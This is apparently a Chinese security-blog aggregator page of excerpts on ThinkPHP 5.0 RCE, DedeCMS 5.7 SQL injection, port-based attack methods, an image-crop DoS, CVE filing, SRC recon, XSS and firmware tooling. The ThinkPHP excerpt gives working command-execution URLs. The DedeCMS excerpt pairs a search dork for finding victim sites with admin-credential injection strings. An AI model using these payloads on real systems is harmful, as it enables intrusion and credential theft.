漏洞

ThinkPHP 5.0 版本存在getshell漏洞 php_rce

只愿长相守 提交于 2020-01-28 00:58:33
查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22 payload:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag 参考自: https://blog.csdn.net/weixin_45425482/article/details/103709085 学习用途 来源: https://www.cnblogs.com/clqnotes/p/12237295.html

dedecms5.7最新注入和上传漏洞

拥有回忆 提交于 2020-01-26 20:47:42
转自: http://www.sa666.com/thread-25247-1-1.html 发布时间:2012-4.26 发布作者:佚名 漏洞类型:注入漏洞、上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,   然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。   然后写上语句 /member/ajax_membergroup.php?action=post&membergroup=@`' ` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id    /member/ajax_membergroup.php?action=post&membergroup=@`' ` Union select pwd from `%23@__admin` where 1 or id=@`'`

3.黑客常用端口利用总结

前提是你 提交于 2020-01-26 20:46:42
端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持/欺骗 110 pop3 爆破/嗅探 139 Samba服务 爆破/未授权访问/远程命令执行 143 Imap协议 爆破 161 SNMP协议 爆破/搜集目标内网信息 389 Ldap目录访问协议 注入/未授权访问/弱口令 445 smb ms17-010/端口溢出 512/513/514 Linux Rexec服务 爆破/Rlogin登陆 873 Rsync服务 文件上传/未授权访问 1080 socket 爆破 1352 Lotus domino邮件服务 爆破/信息泄漏 1433 mssql 爆破/注入/SA弱口令 1521 oracle 爆破/注入/TNS爆破/反弹shell 2049 Nfs服务 配置不当 2181 zookeeper服务 未授权访问 2375 docker remote api 未授权访问 3306 mysql 爆破/注入 3389 Rdp远程桌面链接 爆破/shift后门 4848 GlassFish控制台 爆破/认证绕过 5000 sybase

图片大小相关参数可控导致ddos的一个案例

▼魔方 西西 提交于 2020-01-26 15:28:57
0x0前言 图片大小相关参数可控导致ddos=>影响服务端对图片处理的参数可控,进而可通过修改参数导致服务端分配大量资源处理图片,造成ddos效果 在测试公益src的一个厂商的头像上传功能时没有发现任意文件上传但是发现了这个蛮典型的伪ddos案例 0x1漏洞细节 漏洞点:个人账号头像设置 分析: 1.本地上传 上传后会放在一个专门的文件服务器,此时可通过抓包修改后缀上传指定后缀文件但并没有用,因为不解析 2.上传之后会要求用户对图片进行裁剪,漏洞出在这里 通过抓包可以看到,后端对之前文件服务器中的图片(4452.png)根据相关参数进行裁剪后生成对应的图片文件(8892100.jpg) 此处经过测试,rawW和rawH参数是做了一点限制的,两者的和不能超过某个上限 但cut的4个参数并没有限制 附上未修改参数的请求响应时间做对比 此类漏洞通过burp的intruder就可简单利用,造成ddos效果 这个站点后端似乎有进程锁(?),一个图片资源只能同时被一个进程访问,但也有其他手段绕过 0x3总结 图片处理如果有裁剪功能,就肯定会涉及到裁剪的相关参数,就有可能出现此类伪ddos漏洞 对参数,特别是能影响到服务端资源分配的参数严格限制 来源: https://www.cnblogs.com/Rain99-/p/12234178.html

【转帖】申请CVE的姿势总结

房东的猫 提交于 2020-01-25 00:38:04
申请CVE的姿势总结 https://www.freebuf.com/articles/web/224609.html 什么是CVE? CVE的全称叫做“Common Vulnerabilities & Exposures”中文含义是公共漏洞和暴露。它作为披露漏洞的平台,受到国内外关注。CVE会提供编号作为漏洞对应的字符串式特征,有很多企业倾向于用多少高质量的CVE来证明实力,一些工具和产品也会使用CVE作为漏洞的官方标识。一些企业关注漏洞使用CVE作为修补漏洞的索引依据。 如何去提交CVE? 目前经过总结提炼出来多种申请CVE的方法,每种方法都有利弊,请自行选择。大体上分为两种,公开披露和向CNA成员中问题厂商报告,如果需要披露漏洞请收藏。 申请披露流程 1、公开披露漏洞 -> 提交CVE申请 -> 邮件反馈申请结果 操作流程:CVE官方网站 -> Request CVE IDs(申请CVE ID) -> MITRE CVE Request web form(通过web表单提交) -> 填写表单(如果英文不佳建议使用网页谷歌翻译或者参考之前的文章) -> 等待CVE回复邮件 -> 邮件回复中带有CVE编号 2、邮件CNA中企业 -> 企业确认和修复 -> 企业申请CVE和发布漏洞补丁 操作流程:CVE官方网站 -> Request CVE IDs(申请CVE ID) ->

SRC漏洞挖掘

♀尐吖头ヾ 提交于 2020-01-24 09:52:55
SRC目标搜集 文章类的平台 https://www.anquanke.com/src 百度搜索 首先得知道SRC厂商的关键字,利用脚本搜集一波。 比如【应急响应中心】就可以作为一个关键字。通过搜索引擎搜索一波,去重,入库。 # -*- coding:utf-8 -*- ''' 从百度把前10页的搜索到的url爬取保存 ''' import multiprocessing # 利用pool进程池实现多进程并行 # from threading import Thread 多线程 import time from bs4 import BeautifulSoup # 处理抓到的页面 import sys import requests import importlib importlib.reload(sys) # 编码转换,python3默认utf-8,一般不用加 from urllib import request import urllib ''' all = open('D:\\111\\test.txt', 'a') all.seek(0) #文件标记到初始位置 all.truncate() #清空文件 ''' headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q

如何快速发现XSS跨站攻击漏洞

两盒软妹~` 提交于 2020-01-24 06:45:26
教你如何快速发现XSS跨站攻击漏洞 什么是XSS跨站攻击? 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。(以上内容来自百度百科) 其实简单理解,就是我们的程序,在参数传入时,没有对输入字符串中特殊字符或字符串做合理的检查和处理,如果参数传入的内容中,包含了恶意代码,那么我们的程序就会把这段恶意代码在浏览器中执行。那么,XSS跨站攻击会给我们带来哪些危害呢?下面的这些内容,或许你并不陌生: 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 在哪些地方需要进行XSS跨站攻击的测试验证? 可传参的URL中 可输入内容的表单 怎么快速判断是否有XSS跨站攻击注入点? 即在表单填写框中直接注入攻击脚本(一般都是JS脚本),如在表单中输入JS内容后,正常预期程序是不应该让脚本执行的,如果程序没有对输入内容做有效处理,则提交后程序会执行我们输入的JS代码。 XSS跨站攻击测试示例 下面测试步骤举例以可视化当前暂未被修复的一个XSS跨站攻击点为例

0x00 设备漏洞---固件提取(Binwalk)

谁说胖子不能爱 提交于 2020-01-23 16:45:42
Binwalk安装: Binwalk是一款十分强大的固件分析工具,不仅可以用于提取文件系统,而且可以用于协助研究人员对固件进行分析及逆向工程等。 sudo git clone https://github.com/devttys0/binwalk.git 依赖文件(以下都是) sudo apt-get install libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip sudo pip install pyqtgraph sudo wget http://capstone-engine.org/download/2.1.2/capstone-2.1.2.tar.gz sudo tar -zxvf capstone-2.1.2.tar.gz (cd capstone-2.1.2 && sudo ./make.sh && sudo make install) (cd capstone-2.1.2/bindings/python && sudo python ./setup.py install) 安装固件提取组件。由于在apt资源库中找不到lhasa,因此需要向/etc/apt/source.list目录中添加一个资源 sudo nano /etc/apt

0x01 设备漏洞---Binwalk神器使用

試著忘記壹切 提交于 2020-01-23 16:19:42
1.固件扫描: binwalk xxx.bin 2.提取文件: 选项"-e"按照预定义的配置文件中的提取方法从固件中提取探测到的文件及系统 binwalk -e xxx.bin 选项"-M"根据magic签名扫描结果进行递归提取,仅对"-e"和"-dd"选项有效 binwalk -Me xxx.bin 选项"-d"用于限制递归提取的深度,默认深度为8,仅当"-M"选项存在时有效 binwalk -Me -d 5 xxx.bin 3.文件比较: 选项"-W"和"--hexdump"对给定的文件进行字节比较,可以指定多个文件,这些我呢见的比较结果会按hexdump方式显示,绿色表示在所有文件中这些字节都说相同的,红色表示不同,蓝色表示某些文件中是不同的。该选项可以与"--block"、"--length"、"--offset"、"--terse"选项一起使用 binwalk -W xxx.bin yyy.bin zzz.bin binwalk -W --block=8 --length=64 xxx.bin yyy.bin 4.日志记录: 选项"-f"和"--log=<file>"用于将扫描结果保存到一个指定的文件中。如果不与"-q"选项核用,会同时在stdout和文件中输出。保存CSV格式的log文件使用"--csv"选项。 binwalk -f xxx.log -q xxx.bin

0x02 设备漏洞---模拟处理器(QEMU)

纵然是瞬间 提交于 2020-01-23 16:12:23
QEMU是由Fabrice Bellard编写的模拟处理器自由软件。他与Bochs和PearPC近似,但具有后两者所不具备的一些特性,如高速度及跨平台的特性。经由KQEMU这个闭源的加速器,QEMU能模拟近似真实计算机的速度。 1.获取QEMU资源 git clone git://git.qemu-project.org/qemu.git /opt/qemu$ git submodule update --init pixman /opt/qemu$ git submodule update --init dtc 2.按照依赖文件 sudo apt-get install libglib2.0 libglib2.0-dev sudo apt-get install autoconf automake libtool 3.修改QEMU源文件 如果使用的是低版本的QEMU,那么在运行一个MIPS程序时,可能会遇到不论是使用大端格式的qemu-mips还是小端格式都会报错(Invalid ELF image for this architecture) 这时候需要修改QEMU源文件 /opt/qemu/linux-user$ sudo nano elfload.c 将如下行注释掉 //&& ehdr->e_shentsize == sizeof(struct elf_shdr) 4